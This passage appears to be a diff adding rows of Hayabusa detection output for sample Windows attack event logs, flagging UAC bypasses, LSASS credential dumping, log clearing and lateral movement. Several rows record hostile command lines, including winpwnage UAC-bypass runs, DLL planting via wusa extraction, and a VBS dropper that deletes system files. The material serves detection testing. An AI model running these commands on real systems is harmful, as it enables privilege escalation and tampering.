+2019-05-01 05:35:13.512 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\mmc.exe -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:13.512 +09:00,IEWIN7,1,high,MMC Spawning Windows Shell,,rules/sigma/process_creation/win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:13.512 +09:00,IEWIN7,1,high,Whoami Execution Anomaly,,rules/sigma/process_creation/win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:13.543 +09:00,IEWIN7,1,informational,Process Creation,"Command: whoami /all : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:13.543 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:13.543 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 07:48:59.260 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\vssvc.exe : Path: C:\Windows\System32\VSSVC.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx +2019-05-01 07:49:09.760 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\Installer\MSI4FFD.tmp"" : Path: C:\Windows\Installer\MSI4FFD.tmp : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\msiexec.exe /V",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx +2019-05-01 07:49:09.760 +09:00,IEWIN7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx +2019-05-01 07:49:10.198 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\Installer\MSI4FFD.tmp""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx +2019-05-01 07:49:10.198 +09:00,IEWIN7,1,medium,Always Install Elevated MSI Spawned Cmd And Powershell,,rules/sigma/process_creation/sysmon_always_install_elevated_msi_spawned_cmd_and_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx +2019-05-01 07:52:27.588 +09:00,IEWIN7,1,informational,Process Creation,Command: whoami : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: cmd,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx +2019-05-01 07:52:27.588 +09:00,IEWIN7,1,medium,Whoami 
Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx +2019-05-01 07:52:27.588 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx +2019-05-02 23:48:53.950 +09:00,IEWIN7,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx +2019-05-02 23:50:17.955 +09:00,IEWIN7,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx +2019-05-02 23:50:17.955 +09:00,IEWIN7,10,high,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx +2019-05-02 23:50:17.955 +09:00,IEWIN7,10,high,Accessing WinAPI in PowerShell for Credentials Dumping,,rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx +2019-05-03 02:21:42.678 +09:00,SANS-TBT570,1102,high,Security log was cleared,User: student,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privilegedebug-tokenelevate-hashdump.evtx +2019-05-04 00:20:20.711 +09:00,SANS-TBT570,1102,high,Security log was cleared,User: 
student,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-pwshpayload.evtx +2019-05-04 00:20:27.359 +09:00,SANS-TBT570,4672,informational,Admin Logon,User: tbt570 : LogonID: 0x1861f7,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-pwshpayload.evtx +2019-05-04 00:20:28.308 +09:00,SANS-TBT570,4634,informational,Logoff,User: tbt570 : LogonID: 0x1861f7,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-pwshpayload.evtx +2019-05-08 12:00:11.778 +09:00,DC1.insecurebank.local,1102,high,Security log was cleared,User: administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_security_dcshadow_4742.evtx +2019-05-09 10:59:28.684 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe"" : Path: C:\Windows\System32\eventvwr.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx +2019-05-09 10:59:28.950 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe"" : Path: C:\Windows\System32\eventvwr.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx +2019-05-09 10:59:29.090 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: IEWIN7\IEUser : Parent Command: 
""C:\Windows\system32\eventvwr.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx +2019-05-09 10:59:29.090 +09:00,IEWIN7,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx +2019-05-09 10:59:29.090 +09:00,IEWIN7,1,critical,UAC Bypass via Event Viewer,,rules/sigma/process_creation/process_creation_sysmon_uac_bypass_eventvwr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx +2019-05-09 11:00:01.794 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\System32\wsqmcons.exe : Path: C:\Windows\System32\wsqmcons.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx +2019-05-09 11:07:51.131 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdclt.exe"" /kickoffelev : Path: C:\Windows\System32\sdclt.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UACBypass_SDCLTBypass.evtx +2019-05-09 11:08:00.446 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /c notepad.exe : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ?",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UACBypass_SDCLTBypass.evtx +2019-05-09 11:08:00.446 +09:00,IEWIN7,1,medium,Sdclt Child 
Processes,,rules/sigma/process_creation/sysmon_sdclt_child_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UACBypass_SDCLTBypass.evtx +2019-05-09 11:52:18.844 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\makecab.exe"" C:\Users\IEUser\AppData\Local\Temp\wscript.exe.manifest C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp : Path: C:\Windows\System32\makecab.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 11:52:18.922 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 11:52:18.953 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 11:52:18.969 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 
11:52:19.250 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 11:52:21.250 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\makecab.exe"" C:\Windows\System32\wscript.exe C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp : Path: C:\Windows\System32\makecab.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 11:52:21.265 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 11:52:21.281 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 11:52:21.297 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet : Path: 
C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 11:52:21.594 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 11:52:23.500 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /C ""echo Dim objShell:Dim oFso:Set oFso = CreateObject(""Scripting.FileSystemObject""):Set objShell = WScript.CreateObject(""WScript.Shell""):command = ""powershell.exe"":objShell.Run command, 0:command = ""C:\Windows\System32\cmd.exe /c """"start /b """""""" cmd /c """"timeout /t 5 >nul&&del C:\Windows\wscript.exe&&del C:\Windows\wscript.exe.manifest"""""""""":objShell.Run command, 0:Set objShell = Nothing > ""C:\Users\IEUser\AppData:tghjx5xz2ky.vbs"""" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 11:52:23.531 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /C ""C:\Windows\wscript.exe ""C:\Users\IEUser\AppData:tghjx5xz2ky.vbs"""" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 12:25:24.896 +09:00,IEWIN7,1,informational,Process Creation,"Command: 
""C:\Windows\system32\sdclt.exe"" : Path: C:\Windows\System32\sdclt.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_UACBypass_AppPath_Control.evtx +2019-05-09 12:25:25.067 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /name Microsoft.BackupAndRestoreCenter : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\sdclt.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_UACBypass_AppPath_Control.evtx +2019-05-09 12:25:25.067 +09:00,IEWIN7,1,medium,Sdclt Child Processes,,rules/sigma/process_creation/sysmon_sdclt_child_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_UACBypass_AppPath_Control.evtx +2019-05-10 21:21:57.077 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u uac -i 7 -p c:\Windows\System32\cmd.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_12_11_perfmonUACBypass.evtx +2019-05-10 21:22:08.465 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""c:\users\ieuser\appdata\local\temp\system32\mmc.exe"" ""c:\users\ieuser\appdata\local\temp\system32\perfmon.msc"" : Path: C:\Users\IEUser\AppData\Local\Temp\system32\mmc.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\perfmon.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_12_11_perfmonUACBypass.evtx +2019-05-10 22:32:48.200 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u uac -i 9 -p c:\Windows\System32\cmd.exe : Path: 
C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx +2019-05-10 22:32:58.549 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""c:\Windows\System32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\CompMgmtLauncher.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx +2019-05-10 22:33:29.424 +09:00,IEWIN7,1,informational,Process Creation,"Command: whoami /priv : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: ""c:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx +2019-05-10 22:33:29.424 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx +2019-05-10 22:33:29.424 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx +2019-05-10 22:33:29.424 +09:00,IEWIN7,1,high,Run Whoami Showing Privileges,,rules/sigma/process_creation/win_whoami_priv.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx +2019-05-10 22:49:29.586 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" 
",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx +2019-05-10 22:49:39.930 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32 /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx +2019-05-10 22:49:40.164 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32 /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx +2019-05-10 22:49:45.133 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cliconfg.exe"" : Path: C:\Windows\System32\cliconfg.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx +2019-05-10 22:49:45.378 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cliconfg.exe"" : Path: C:\Windows\System32\cliconfg.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx +2019-05-11 18:50:08.248 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx +2019-05-11 18:50:13.494 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\makecab.exe"" c:\users\ieuser\appdata\local\temp\CRYPTBASE.dll c:\users\ieuser\appdata\local\temp\suspicious.cab : Path: C:\Windows\System32\makecab.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx +2019-05-11 18:50:18.404 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\ehome /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx +2019-05-11 18:50:18.654 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\ehome /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx 
+2019-05-11 18:50:26.779 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\ehome\mcx2prov.exe"" : Path: C:\Windows\ehome\Mcx2Prov.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx +2019-05-11 18:50:27.018 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\ehome\mcx2prov.exe"" : Path: C:\Windows\ehome\Mcx2Prov.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx +2019-05-12 01:46:10.125 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u uac -i 13 -p c:\Users\IEUser\Desktop\hellox86.dll : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx +2019-05-12 01:46:15.500 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\makecab.exe"" c:\users\ieuser\appdata\local\temp\CRYPTBASE.dll c:\users\ieuser\appdata\local\temp\suspicious.cab : Path: C:\Windows\System32\makecab.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 13 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx +2019-05-12 01:46:20.531 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\migwiz /quiet : Path: 
